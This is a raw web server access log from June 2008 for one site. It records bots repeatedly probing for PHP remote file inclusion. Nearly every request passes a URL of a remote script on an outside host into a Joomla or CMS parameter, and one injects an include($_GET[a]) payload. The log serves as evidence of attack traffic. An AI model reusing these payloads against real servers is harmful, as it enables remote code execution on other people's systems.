69.89.25.154 - - [11/Jun/2008:12:49:29 -0700] "GET /index.php?pg=http://Sin1.freehostia.com/pw.txt? HTTP/1.1" 200 18379 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.25.154 - - [11/Jun/2008:12:49:29 -0700] "GET /logs/index.php?pg=http://Sin1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.230.197.245 - - [11/Jun/2008:12:49:39 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [11/Jun/2008:12:49:39 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [11/Jun/2008:12:49:45 -0700] "GET /logs/access.log/index.php?pg=http://Sin1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [11/Jun/2008:12:49:48 -0700] "GET /index.php?pg=http://Sin1.freehostia.com/pw.txt? HTTP/1.1" 200 18379 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [11/Jun/2008:12:49:49 -0700] "GET /logs/index.php?pg=http://Sin1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.140.19.142 - - [11/Jun/2008:12:49:54 -0700] "GET /logs/admin/classes/TplLoad.php?full_path_to_public_program=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.140.19.142 - - [11/Jun/2008:12:49:55 -0700] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
81.174.65.190 - - [11/Jun/2008:12:50:12 -0700] "GET /logs/access_071231.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.exacta-learning.com//images/.bash/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.89.25.154 - - [11/Jun/2008:12:50:22 -0700] "GET /logs/access_080310.log//components/com_calendar.php?absolute_path=http://Sin1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.25.154 - - [11/Jun/2008:12:50:22 -0700] "GET //components/com_calendar.php?absolute_path=http://Sin1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.25.154 - - [11/Jun/2008:12:50:22 -0700] "GET /logs//components/com_calendar.php?absolute_path=http://Sin1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.230.197.245 - - [11/Jun/2008:12:50:28 -0700] "GET /logs/access_080310.log//components/com_calendar.php?absolute_path=http://Sin1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [11/Jun/2008:12:50:28 -0700] "GET //components/com_calendar.php?absolute_path=http://Sin1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [11/Jun/2008:12:50:28 -0700] "GET /logs//components/com_calendar.php?absolute_path=http://Sin1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.89.25.154 - - [11/Jun/2008:12:50:36 -0700] "GET /logs/access_080226.log//components/com_calendar.php?absolute_path=http://Sin1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.230.197.245 - - [11/Jun/2008:12:50:41 -0700] "GET /logs/access_080226.log//components/com_calendar.php?absolute_path=http://Sin1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.118.88.84 - - [11/Jun/2008:12:51:00 -0700] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://www.reskate.net/chicas/albums/album44/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.118.88.84 - - [11/Jun/2008:12:51:08 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.reskate.net/chicas/albums/album44/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.118.88.84 - - [11/Jun/2008:12:51:08 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.reskate.net/chicas/albums/album44/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.53.240.146 - - [11/Jun/2008:12:51:52 -0700] "GET //components/com_calendar.php?absolute_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
74.53.240.146 - - [11/Jun/2008:12:51:52 -0700] "GET /logs//components/com_calendar.php?absolute_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
80.154.38.121 - - [11/Jun/2008:12:52:04 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://mfe-gay.de/cek.txt?? HTTP/1.1" 200 3694 "-" "libwww-perl/5.805" "www.dmulk.com"
81.174.65.190 - - [11/Jun/2008:12:52:10 -0700] "GET /logs/access_071228.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.exacta-learning.com//images/.bash/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
203.22.204.80 - - [11/Jun/2008:12:52:19 -0700] "GET /logs/access.log/index.php?pg=http://Sin1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.80 - - [11/Jun/2008:12:52:20 -0700] "GET /index.php?pg=http://Sin1.freehostia.com/pw.txt? HTTP/1.1" 200 18379 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.80 - - [11/Jun/2008:12:52:20 -0700] "GET /logs/index.php?pg=http://Sin1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
74.52.114.58 - - [11/Jun/2008:12:52:33 -0700] "GET /logs/access_080310.log//components/com_calendar.php?absolute_path=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.114.58 - - [11/Jun/2008:12:52:33 -0700] "GET //components/com_calendar.php?absolute_path=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.114.58 - - [11/Jun/2008:12:52:34 -0700] "GET /logs//components/com_calendar.php?absolute_path=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.114.58 - - [11/Jun/2008:12:52:46 -0700] "GET /logs/access_080226.log//components/com_calendar.php?absolute_path=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.230.197.245 - - [11/Jun/2008:12:52:48 -0700] "GET /logs/access_080108.log/index.php?seccion=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
80.154.38.121 - - [11/Jun/2008:12:52:49 -0700] "GET /showtree.php?tree=Pulfords&&DI=6244&IG=150105148c564b998141cd9e5abdd82d&POS=9&CM=WPU&CE=9&CS=AWP&SR=9&sample=1/historytemplate.php?cms[support]=1&cms[tngpath]=http://mfe-gay.de/cek.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.230.197.245 - - [11/Jun/2008:12:52:50 -0700] "GET /index.php?seccion=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 200 18389 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [11/Jun/2008:12:52:51 -0700] "GET /logs/index.php?seccion=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
211.239.161.10 - - [11/Jun/2008:12:52:53 -0700] "GET /logs/access_080309.log//errors.php?error=http://1800autoauction.com/logs/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [11/Jun/2008:12:52:53 -0700] "GET //errors.php?error=http://1800autoauction.com/logs/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [11/Jun/2008:12:52:54 -0700] "GET /logs//errors.php?error=http://1800autoauction.com/logs/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.230.197.245 - - [11/Jun/2008:12:52:54 -0700] "GET /logs/access_080220.log/joomla/index.php?option=com_restaurante&task=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.89.25.154 - - [11/Jun/2008:12:52:55 -0700] "GET /logs/access_080108.log/index.php?seccion=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.52.114.58 - - [11/Jun/2008:12:52:56 -0700] "GET /logs/access_080108.log/index.php?seccion=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.89.25.154 - - [11/Jun/2008:12:52:57 -0700] "GET /index.php?seccion=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 200 18389 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.25.154 - - [11/Jun/2008:12:52:57 -0700] "GET /logs/index.php?seccion=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.52.114.58 - - [11/Jun/2008:12:52:58 -0700] "GET /index.php?seccion=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 200 18373 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.114.58 - - [11/Jun/2008:12:52:58 -0700] "GET /logs/index.php?seccion=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
160.99.12.231 - - [11/Jun/2008:12:53:17 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
160.99.12.231 - - [11/Jun/2008:12:53:18 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.230.197.245 - - [11/Jun/2008:12:53:20 -0700] "GET /logs/access_080228.log/joomla/index.php?option=com_restaurante&task=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [11/Jun/2008:12:53:23 -0700] "GET /logs/access_080310.log//components/com_calendar.php?absolute_path=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [11/Jun/2008:12:53:24 -0700] "GET //components/com_calendar.php?absolute_path=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [11/Jun/2008:12:53:24 -0700] "GET /logs//components/com_calendar.php?absolute_path=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.177.153 - - [11/Jun/2008:12:53:33 -0700] "GET /logs/index2.php?x=http://linuxsolutions.co.ug/linux/cache/vuln.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.177.153 - - [11/Jun/2008:12:53:34 -0700] "GET /index2.php?x=http://linuxsolutions.co.ug/linux/cache/vuln.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.140.19.142 - - [11/Jun/2008:12:53:34 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.140.19.142 - - [11/Jun/2008:12:53:34 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.230.197.245 - - [11/Jun/2008:12:53:37 -0700] "GET /logs/access_080226.log//components/com_calendar.php?absolute_path=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.114.58 - - [11/Jun/2008:12:53:55 -0700] "GET /logs/access.log/index.php?pg=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.108.64.152 - - [11/Jun/2008:12:53:57 -0700] "GET /logs//include.php?path[docroot]=http://loveyou-love.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.64.152 - - [11/Jun/2008:12:53:57 -0700] "GET //include.php?path[docroot]=http://loveyou-love.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.114.58 - - [11/Jun/2008:12:53:57 -0700] "GET /index.php?pg=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 200 18379 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.114.58 - - [11/Jun/2008:12:53:57 -0700] "GET /logs/index.php?pg=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.2.100.138 - - [11/Jun/2008:12:54:03 -0700] "GET /logs/access_080308.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [11/Jun/2008:12:54:04 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [11/Jun/2008:12:54:05 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.230.197.245 - - [11/Jun/2008:12:54:14 -0700] "GET /logs/access.log/index.php?pg=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [11/Jun/2008:12:54:15 -0700] "GET /index.php?pg=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 200 18379 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [11/Jun/2008:12:54:16 -0700] "GET /logs/index.php?pg=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.141.56.36 - - [11/Jun/2008:12:54:48 -0700] "GET /logs/access_071225.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.grupslactancia.info/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.48.67.39 - - [11/Jun/2008:12:55:03 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://powderpuffsquad.com//images/press/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.67.39 - - [11/Jun/2008:12:55:04 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://powderpuffsquad.com//images/press/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.185.237.149 - - [11/Jun/2008:12:55:22 -0700] "GET //config.inc.php?path_escape=http://www.geocities.com/vianarina/test.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
64.185.237.149 - - [11/Jun/2008:12:55:22 -0700] "GET /logs//config.inc.php?path_escape=http://www.geocities.com/vianarina/test.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
74.52.114.58 - - [11/Jun/2008:12:56:05 -0700] "GET /logs/access_080201.log/index.php?pagina=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.114.58 - - [11/Jun/2008:12:56:07 -0700] "GET /index.php?pagina=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 200 18387 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.114.58 - - [11/Jun/2008:12:56:07 -0700] "GET /logs/index.php?pagina=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.106.101.24 - - [11/Jun/2008:12:56:32 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.24 - - [11/Jun/2008:12:56:32 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.235.34.19 - - [11/Jun/2008:12:56:35 -0700] "GET /logs/access_080329.log//index2.php?content=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.89.25.154 - - [11/Jun/2008:12:56:36 -0700] "GET /logs/access_080201.log/index.php?pagina=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.25.154 - - [11/Jun/2008:12:56:37 -0700] "GET /index.php?pagina=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 200 18387 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.25.154 - - [11/Jun/2008:12:56:38 -0700] "GET /logs/index.php?pagina=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.230.197.245 - - [11/Jun/2008:12:56:47 -0700] "GET /logs/access_080201.log/index.php?pagina=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [11/Jun/2008:12:56:48 -0700] "GET /index.php?pagina=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 200 18387 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [11/Jun/2008:12:56:49 -0700] "GET /logs/index.php?pagina=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.106.101.24 - - [11/Jun/2008:12:56:52 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.109.12 - - [11/Jun/2008:12:56:52 -0700] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.team-nds.de/includes/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.101.24 - - [11/Jun/2008:12:56:52 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.109.12 - - [11/Jun/2008:12:56:53 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.team-nds.de/includes/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.109.12 - - [11/Jun/2008:12:56:53 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.team-nds.de/includes/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
160.99.12.231 - - [11/Jun/2008:12:57:04 -0700] "GET /logs/access_080220.log/joomla/index.php?option=com_restaurante&task=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.118.88.84 - - [11/Jun/2008:12:57:08 -0700] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.reskate.net/chicas/albums/album44/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
82.194.71.79 - - [11/Jun/2008:12:57:08 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://powderpuffsquad.com/admin/backups/.de/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
82.194.71.79 - - [11/Jun/2008:12:57:09 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://powderpuffsquad.com/admin/backups/.de/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
82.194.71.79 - - [11/Jun/2008:12:57:09 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://powderpuffsquad.com/admin/backups/.de/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [11/Jun/2008:12:57:10 -0700] "GET /logs/access_080131.log/home.php?pag=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [11/Jun/2008:12:57:10 -0700] "GET /home.php?pag=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [11/Jun/2008:12:57:10 -0700] "GET /logs/home.php?pag=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.114.58 - - [11/Jun/2008:12:57:11 -0700] "GET /logs/access_080131.log/home.php?pag=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.114.58 - - [11/Jun/2008:12:57:11 -0700] "GET /home.php?pag=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.114.58 - - [11/Jun/2008:12:57:11 -0700] "GET /logs/home.php?pag=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
206.221.179.200 - - [11/Jun/2008:12:57:14 -0700] "GET //errors.php?error=http://1800autoauction.com/logs/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
206.221.179.200 - - [11/Jun/2008:12:57:14 -0700] "GET /logs//errors.php?error=http://1800autoauction.com/logs/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
85.214.109.12 - - [11/Jun/2008:12:57:15 -0700] "GET /logs/access_080226.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.team-nds.de/includes/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.89.25.154 - - [11/Jun/2008:12:57:27 -0700] "GET /logs/access_080131.log/home.php?pag=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.25.154 - - [11/Jun/2008:12:57:27 -0700] "GET /home.php?pag=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.25.154 - - [11/Jun/2008:12:57:27 -0700] "GET /logs/home.php?pag=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.80.245.245 - - [11/Jun/2008:12:57:30 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.lernservicecenter.de/lsc/administrator/components/com_css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.114.58 - - [11/Jun/2008:12:57:36 -0700] "GET /logs/access_071230.log/home.php?pag=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.230.197.245 - - [11/Jun/2008:12:57:38 -0700] "GET /logs/access_071230.log/home.php?pag=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
160.99.12.231 - - [11/Jun/2008:12:57:43 -0700] "GET /logs/access_080228.log/joomla/index.php?option=com_restaurante&task=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.89.25.154 - - [11/Jun/2008:12:57:47 -0700] "GET /logs/access_071230.log/home.php?pag=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.106.101.24 - - [11/Jun/2008:12:57:48 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.24 - - [11/Jun/2008:12:57:48 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.240.146 - - [11/Jun/2008:12:58:19 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://powderpuffsquad.com//images/press/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [11/Jun/2008:12:58:19 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://powderpuffsquad.com//images/press/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.48.67.39 - - [11/Jun/2008:12:58:23 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://powderpuffsquad.com//images/press/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.67.39 - - [11/Jun/2008:12:58:23 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://powderpuffsquad.com//images/press/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.98.71 - - [11/Jun/2008:12:58:31 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.98.71 - - [11/Jun/2008:12:58:31 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.250.121.2 - - [11/Jun/2008:12:58:51 -0700] "GET /logs/access_080131.log/home.php?pag=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
